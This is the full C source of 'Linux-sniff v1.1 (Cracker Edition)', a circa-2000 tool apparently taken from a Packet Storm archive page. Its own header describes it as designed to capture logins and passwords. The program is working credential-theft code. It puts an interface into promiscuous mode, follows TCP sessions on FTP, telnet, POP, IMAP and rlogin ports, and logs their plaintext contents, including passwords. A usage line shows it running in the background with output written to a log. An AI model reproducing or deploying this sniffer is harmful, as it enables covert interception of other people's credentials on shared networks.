Linux-sniff v1.1 - Linux eth/tcp/ip sniffer. This tool logs printable data in the packet or it gives detailed info about the eth/tcp/ip packet headers.
aa0a5d092ab55cc36c876afc9d7012d7708f55364218a2cb3eb2ab92776c9b3e/*
* Linux-sniff v1.1 NOTE: NOT FOR EDUCATIONAL USE!
*
* Copyright (C) 2000 Xphere (xphere@obit.nl).
*
* Linux tcp packets sniffer. The Cracker edition of Linux-sniff v1.0.
* Logs traffic to hardcoded ports. Designed to capture logins + passwords.
* E-mail comments and whatever you want to Xphere (xphere@obit.nl).
*
* Compile: gcc -O3 -Wall linux-sniff1.1.c -o linux-sniff
*
* Greetz: #phreak.nl - http://www.casema.net/~gin
*
*/
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/socket.h>
#include <linux/sockios.h>
#include <linux/if_ether.h>
int check_port(int port);
int open_fd(char *intf);
char *lookup(long ip);
void print_dat(int d_size, char *data);
void print_pkt(unsigned long saddr, unsigned long daddr,
unsigned short src_port, unsigned short dst_port,
int d_size, char *data);
void rm_pkt(int i);
void check_pkt();
int find_pkt(struct iphdr *ip, struct tcphdr *tcp);
void reset_pkt(struct iphdr *ip, struct tcphdr *tcp);
void init_pkt(struct iphdr *ip, struct tcphdr *tcp);
void data_pkt(struct iphdr *ip, struct tcphdr *tcp, int d_size, char *data);
void proc_packet(char *buf);
void init_pkt_list();
void terminate();
int main (int argc, char *argv[]);
/* The ports to sniff. DON'T REMOVE THE ZERO! */
int ports[] = { 21, 23, 110, 109, 143, 513, 0 };
struct {
unsigned long src_addr;
unsigned long dst_addr;
unsigned short src_port;
unsigned short dst_port;
int state;
int d_size;
long start_time;
char *data;
} pkt_list[1024];
int check_port(int port)
{
int i;
for (i = 0; ports[i] > 0; ++i) {
if (port == ports[i]) {
return(1);
}
}
return(0);
}
int open_fd(char *intf)
{
int f, s;
struct ifreq ifr;
if ((f = socket(AF_INET, SOCK_PACKET, htons(0x800))) < 0) {
return(-1);
}
strcpy(ifr.ifr_name, intf);
if ((s = ioctl(f, SIOCGIFFLAGS, &ifr)) < 0) {
close(f);
return(-1);
}
ifr.ifr_flags |= IFF_PROMISC;
if ((s = ioctl(f, SIOCSIFFLAGS, &ifr)) < 0) {
return(-1);
}
return(f);
}
char *lookup(long ip)
{
static char n[1024];
struct in_addr ia;
struct hostent *he;
ia.s_addr = ip;
he = gethostbyaddr((char *) &ia, sizeof(struct in_addr), AF_INET);
if ((sizeof(he->h_name) <= sizeof(n)) && he != NULL) {
strcpy(n, he->h_name);
}
else {
strcpy(n, inet_ntoa(ia));
}
return(n);
}
void print_dat(int d_size, char *data)
{
int i = 0;
for (i = 0; i < d_size; ++i) {
if (data[i] == 13) {
fprintf(stdout, "\n");
}
if (isprint(data[i])) {
fprintf(stdout, "%c", data[i]);
}
}
return;
}
void print_pkt(unsigned long saddr, unsigned long daddr,
unsigned short src_port, unsigned short dst_port,
int d_size, char *data) {
fprintf(stdout, "+-----< HOST: %s ", lookup(saddr));
fprintf(stdout, "PORT: %d -> ", ntohs(src_port));
fprintf(stdout, "HOST: %s ", lookup(daddr));
fprintf(stdout, "PORT: %d >\n\n", ntohs(dst_port));
print_dat(d_size, data);
return;
}
void rm_pkt(int i)
{
pkt_list[i].src_addr = 0;
pkt_list[i].dst_addr = 0;
pkt_list[i].src_port = 0;
pkt_list[i].dst_port = 0;
pkt_list[i].state = 0;
pkt_list[i].d_size = 0;
pkt_list[i].start_time = 0;
free(pkt_list[i].data);
pkt_list[i].data = NULL;
return;
}
void check_pkt()
{
int i;
for (i = 0; i < 1024; ++i) {
if (pkt_list[i].state == 1) {
if ((pkt_list[i].start_time + 600) < time(NULL)) {
print_pkt(pkt_list[i].src_addr, pkt_list[i].dst_addr,
pkt_list[i].src_port, pkt_list[i].dst_port,
pkt_list[i].d_size, pkt_list[i].data);
fprintf(stdout, "\n+-----< Timed out. >\n\n\n");
rm_pkt(i);
}
}
}
return;
}
int find_pkt(struct iphdr *ip, struct tcphdr *tcp)
{
int i;
for (i = 0; i < 1024; ++i) {
if (pkt_list[i].state == 1) {
if ((pkt_list[i].src_addr == ip->saddr) &&
(pkt_list[i].dst_addr == ip->daddr) &&
(pkt_list[i].src_port == tcp->source) &&
(pkt_list[i].dst_port == tcp->dest)) {
return(i);
}
}
}
return(-1);
}
void reset_pkt(struct iphdr *ip, struct tcphdr *tcp)
{
int i;
if ((i = find_pkt(ip, tcp)) > -1) {
print_pkt(pkt_list[i].src_addr, pkt_list[i].dst_addr,
pkt_list[i].src_port, pkt_list[i].dst_port,
pkt_list[i].d_size, pkt_list[i].data);
fprintf(stdout, "\n+-----< Received FIN/RST. >\n\n\n");
fflush(stdout);
rm_pkt(i);
}
return;
}
void init_pkt(struct iphdr *ip, struct tcphdr *tcp)
{
int i;
for (i = 0; i < 1024; ++i) {
if (pkt_list[i].state == 0) {
pkt_list[i].src_addr = ip->saddr;
pkt_list[i].dst_addr = ip->daddr;
pkt_list[i].src_port = tcp->source;
pkt_list[i].dst_port = tcp->dest;
pkt_list[i].state = 1;
pkt_list[i].start_time = time(NULL);
return;
}
}
return;
}
void data_pkt(struct iphdr *ip, struct tcphdr *tcp, int d_size, char *data)
{
int i, t, k = 0;
char *bsd;
if ((i = find_pkt(ip, tcp)) > -1) {
if (d_size > 0) {
if (pkt_list[i].data == NULL) {
pkt_list[i].data = malloc(d_size);
memset(pkt_list[i].data, 0, d_size);
pkt_list[i].d_size += d_size;
for (t = 0; t < d_size; ++t) {
pkt_list[i].data[t] = data[t];
}
}
else {
bsd = pkt_list[i].data;
pkt_list[i].data = malloc(pkt_list[i].d_size + d_size);
memset(pkt_list[i].data, 0, pkt_list[i].d_size + d_size);
for (t = 0; t < pkt_list[i].d_size; ++t) {
pkt_list[i].data[k] = bsd[t];
++k;
}
pkt_list[i].d_size += d_size;
for (t = 0; t < d_size; ++t) {
pkt_list[i].data[k] = data[t];
++k;
}
free(bsd);
}
}
}
return;
}
void proc_packet(char *buf)
{
struct ethhdr *eth;
struct iphdr *ip;
struct tcphdr *tcp;
char *data;
int d_size, e_size, i_size, t_size;
e_size = sizeof(struct ethhdr);
i_size = sizeof(struct iphdr);
t_size = sizeof(struct tcphdr);
eth = (struct ethhdr *) buf;
ip = (struct iphdr *) (buf + e_size);
tcp = (struct tcphdr *) (buf + e_size + i_size);
data = (buf + e_size + i_size + t_size);
d_size = (htons(ip->tot_len) - i_size - t_size);
if (ip->protocol != 6) {
return;
}
if (check_port(ntohs(tcp->dest)) == 0) {
return;
}
check_pkt();
if ((tcp->syn == 1) && (find_pkt(ip, tcp) == -1)) {
init_pkt(ip, tcp);
}
else if ((tcp->rst == 1) || (tcp->fin == 1)) {
reset_pkt(ip, tcp);
}
else {
data_pkt(ip, tcp, d_size, data);
}
return;
}
void init_pkt_list()
{
int i;
for (i = 0; i < 1024; ++i) {
pkt_list[i].src_addr = 0;
pkt_list[i].dst_addr = 0;
pkt_list[i].src_port = 0;
pkt_list[i].dst_port = 0;
pkt_list[i].state = 0;
pkt_list[i].start_time = 0;
pkt_list[i].data = NULL;
}
return;
}
void terminate()
{
fprintf(stdout, "Received signal, exiting.\n");
exit(0);
}
int main (int argc, char *argv[])
{
int sd, i;
char buf[1600];
if (argc != 2) {
fprintf(stderr, "\n\e[0;34m[ Linux-sniff v1.1 (Cracker Edition) ");
fprintf(stderr, "by: Xphere -- #phreak.nl ]\e[0m\n\n\n");
fprintf(stderr, "Usage: %s <interface>\n", argv[0]);
fprintf(stderr, "Example: %s eth0 > sniff.log &\n", argv[0]);
exit(-1);
}
if ((sd = open_fd(argv[1])) < 0) {
fprintf(stderr, "Error: can't get promicuous socket.\n");
exit(-1);
}
signal(SIGINT, terminate);
signal(SIGKILL, terminate);
signal(SIGQUIT, terminate);
signal(SIGTERM, terminate);
signal(SIGHUP, SIG_IGN);
fprintf(stdout, "\n[ Linux-sniff v1.1 (Cracker Edition) ");
fprintf(stdout, "by: Xphere -- #phreak.nl ]\n\n\n");
init_pkt_list();
while (1) {
memset(&buf, 0, sizeof(buf));
if ((i = read(sd, buf, sizeof(buf) - 1)) > 1) {
proc_packet(buf);
}
}
exit(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed